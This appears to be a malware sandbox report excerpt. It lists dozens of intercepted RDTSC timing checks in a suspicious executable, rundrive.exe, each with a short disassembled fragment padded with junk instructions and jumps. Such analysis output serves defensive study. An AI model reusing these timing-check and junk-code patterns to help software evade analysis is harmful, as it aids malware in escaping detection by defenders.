Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696DEE second address: 696DF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696DF4 second address: 696DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696DF8 second address: 696DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69A1FC second address: 69A202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69A27E second address: 69A29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FDA80C0087Fh 0x0000000c popad 0x0000000d push eax 0x0000000e jp 00007FDA80C0087Eh 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69A29F second address: 69A2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov edx, dword ptr [ebp+122D1E02h] 0x0000000c add dx, 0153h 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FDA80C026B8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jng 00007FDA80C026BCh 0x00000033 mov edx, dword ptr [ebp+122D1FD0h] 0x00000039 push 2E288CA5h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007FDA80C026B8h 0x00000046 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69A2EA second address: 69A2F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69B7DF second address: 69B7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69D772 second address: 69D776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69D776 second address: 69D77C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69F462 second address: 69F476 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FDA80C00876h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69F476 second address: 69F480 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69F480 second address: 69F486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 402CE0 second address: 402CE0 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push edi 0x00000007 push esi 0x00000008 imul eax, eax, 001E7319h 0x0000000e add eax, 3CFB5543h 0x00000013 rcr eax, 10h 0x00000016 add eax, esi 0x00000018 imul eax, edi 0x0000001b xor edx, edx 0x0000001d mul dword ptr [ebp+08h] 0x00000020 mov eax, edx 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop ebx 0x00000025 leave 0x00000026 retn 0004h 0x00000029 lea eax, dword ptr [eax+00000300h] 0x0000002f push eax 0x00000030 push 00405BFCh 0x00000035 call 00007FDA80C04085h 0x0000003a push ebp 0x0000003b mov ebp, esp 0x0000003d push ebx 0x0000003e push edi 0x0000003f push esi 0x00000040 mov edi, dword ptr [ebp+08h] 0x00000043 push 000000FFh 0x00000048 call 00007FDA80C0298Eh 0x0000004d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49504CA second address: 49504E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C00884h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495057A second address: 4950597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dl, 50h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495064D second address: 4950652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950597 second address: 49505D4 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 1DA617DAh 0x00000011 pushfd 0x00000012 jmp 00007FDA80C026BBh 0x00000017 or si, 357Eh 0x0000001c jmp 00007FDA80C026C9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950652 second address: 4950669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 32F4BF98h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, F0DCh 0x00000014 mov bl, 3Eh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49505D4 second address: 49505DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6A2F4792h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950669 second address: 4950677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C0087Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49505DE second address: 49505F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 mov di, 9A66h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950677 second address: 49506CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDA80C00884h 0x00000015 or esi, 3EBFC458h 0x0000001b jmp 00007FDA80C0087Bh 0x00000020 popfd 0x00000021 mov ch, B5h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FDA80C0087Bh 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49506CA second address: 49506CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49506CE second address: 49506E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49505F5 second address: 49505FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49505FB second address: 49505FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49505FF second address: 4930654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c jmp 00007FDA80C026C0h 0x00000011 jmp dword ptr [759811CCh] 0x00000017 mov edi, edi 0x00000019 push ebp 0x0000001a mov ebp, esp 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f sub esp, 1Ch 0x00000022 test eax, eax 0x00000024 je 00007FDA80C0274Eh 0x0000002a mov eax, dword ptr fs:[00000030h] 0x00000030 mov eax, dword ptr [eax+08h] 0x00000033 mov esp, ebp 0x00000035 pop ebp 0x00000036 retn 0004h 0x00000039 mov dword ptr [ebp-04h], eax 0x0000003c mov dword ptr [ebp-48h], 00000000h 0x00000043 mov eax, dword ptr [ebp+08h] 0x00000046 mov dword ptr [ebp-44h], eax 0x00000049 mov dword ptr [ebp-40h], 00000000h 0x00000050 mov dword ptr [ebp-3Ch], 00000000h 0x00000057 mov eax, dword ptr [ebp-04h] 0x0000005a mov dword ptr [ebp-38h], eax 0x0000005d mov dword ptr [ebp-28h], 00000000h 0x00000064 lea eax, dword ptr [ebp-0000024Ch] 0x0000006a mov dword ptr [ebp-24h], eax 0x0000006d push 00007F04h 0x00000072 push 00000000h 0x00000074 call 00007FDA80C04277h 0x00000079 jmp 00007FDA8512FBAFh 0x0000007e mov edi, edi 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 pushfd 0x00000084 jmp 00007FDA80C026C9h 0x00000089 jmp 00007FDA80C026BBh 0x0000008e popfd 0x0000008f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930654 second address: 493068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FDA80C00884h 0x0000000c or ecx, 0F2973B8h 0x00000012 jmp 00007FDA80C0087Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov si, di 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493068C second address: 4930693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930693 second address: 49306B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FDA80C0087Bh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop ecx 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49306B0 second address: 49306B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49306B6 second address: 49306BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49306BA second address: 4930700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDA80C026BEh 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDA80C026BDh 0x00000019 xor esi, 62216116h 0x0000001f jmp 00007FDA80C026C1h 0x00000024 popfd 0x00000025 mov bx, ax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930700 second address: 4930719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, BB50h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930719 second address: 4930760 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FDA80C026BCh 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FDA80C026BDh 0x00000017 pushfd 0x00000018 jmp 00007FDA80C026C0h 0x0000001d adc al, FFFFFFF8h 0x00000020 jmp 00007FDA80C026BBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930760 second address: 4930766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930766 second address: 493076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493076A second address: 493076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493076E second address: 4930792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d mov esi, ebx 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 jmp 00007FDA80C026BBh 0x00000016 sub edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930792 second address: 4930798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930798 second address: 49307F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test dword ptr [ebp+0Ch], FFFF0000h 0x00000010 jmp 00007FDA80C026C6h 0x00000015 jne 00007FDAF1D7165Dh 0x0000001b pushad 0x0000001c mov esi, 0B1259ADh 0x00000021 movzx ecx, di 0x00000024 popad 0x00000025 mov edx, dword ptr [ebp+0Ch] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FDA80C026C0h 0x0000002f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49307F1 second address: 4930803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930803 second address: 4930876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDA80C026C3h 0x00000013 adc ecx, 43BD27EEh 0x00000019 jmp 00007FDA80C026C9h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007FDA80C026BEh 0x00000027 popad 0x00000028 call 00007FDA80C026B9h 0x0000002d jmp 00007FDA80C026C0h 0x00000032 push eax 0x00000033 pushad 0x00000034 mov ecx, ebx 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930876 second address: 4930886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930886 second address: 493088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493088A second address: 4930890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930890 second address: 4930896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930896 second address: 493089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493089A second address: 49308B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C026BCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49308B2 second address: 49308EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 82D4h 0x00000007 pushfd 0x00000008 jmp 00007FDA80C0087Dh 0x0000000d sbb cl, FFFFFF96h 0x00000010 jmp 00007FDA80C00881h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ah, 12h 0x00000022 push edi 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49308EB second address: 4930949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FDA80C026C0h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov al, 60h 0x00000013 mov eax, edx 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007FDA80C026C2h 0x0000001d push eax 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 mov si, bx 0x00000023 popad 0x00000024 xchg eax, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDA80C026C4h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930949 second address: 493095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493095B second address: 493099A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, EE4Ch 0x00000010 pushfd 0x00000011 jmp 00007FDA80C026C5h 0x00000016 and eax, 5C022B26h 0x0000001c jmp 00007FDA80C026C1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493099A second address: 49309AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C0087Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49309AA second address: 49309D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b jmp 00007FDA80C026C7h 0x00000010 push 00000003h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov di, 6DE6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930A09 second address: 4930A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FDA80C0087Ch 0x00000011 sub cx, E718h 0x00000016 jmp 00007FDA80C0087Bh 0x0000001b popfd 0x0000001c jmp 00007FDA80C00888h 0x00000021 popad 0x00000022 leave 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bx, 5790h 0x0000002a push edx 0x0000002b pop eax 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930A62 second address: 4930A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930A68 second address: 4930A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930A6C second address: 4930ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b mov dword ptr [ebp-34h], eax 0x0000000e push 00007F01h 0x00000013 push 00000000h 0x00000015 call 00007FDA80C04262h 0x0000001a jmp 00007FDA85130003h 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ebx 0x00000026 pushad 0x00000027 call 00007FDA80C026BEh 0x0000002c pop ecx 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 movsx ebx, si 0x00000039 pushfd 0x0000003a jmp 00007FDA80C026C0h 0x0000003f sub cx, 1D68h 0x00000044 jmp 00007FDA80C026BBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930ABD second address: 4930AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930AC3 second address: 4930AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930AC7 second address: 4930BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007FDA80C0087Fh 0x00000012 call 00007FDA80C00888h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c movsx edi, ax 0x0000001f jmp 00007FDA80C00884h 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FDA80C0087Eh 0x0000002e adc ch, FFFFFFB8h 0x00000031 jmp 00007FDA80C0087Bh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FDA80C00888h 0x0000003d sbb cl, 00000018h 0x00000040 jmp 00007FDA80C0087Bh 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ecx 0x00000048 pushad 0x00000049 mov di, cx 0x0000004c pushfd 0x0000004d jmp 00007FDA80C00880h 0x00000052 add cx, E478h 0x00000057 jmp 00007FDA80C0087Bh 0x0000005c popfd 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FDA80C0087Bh 0x00000068 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BA0 second address: 4930BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BA4 second address: 4930BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BAA second address: 4930BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BB0 second address: 4930BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BB4 second address: 4930BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
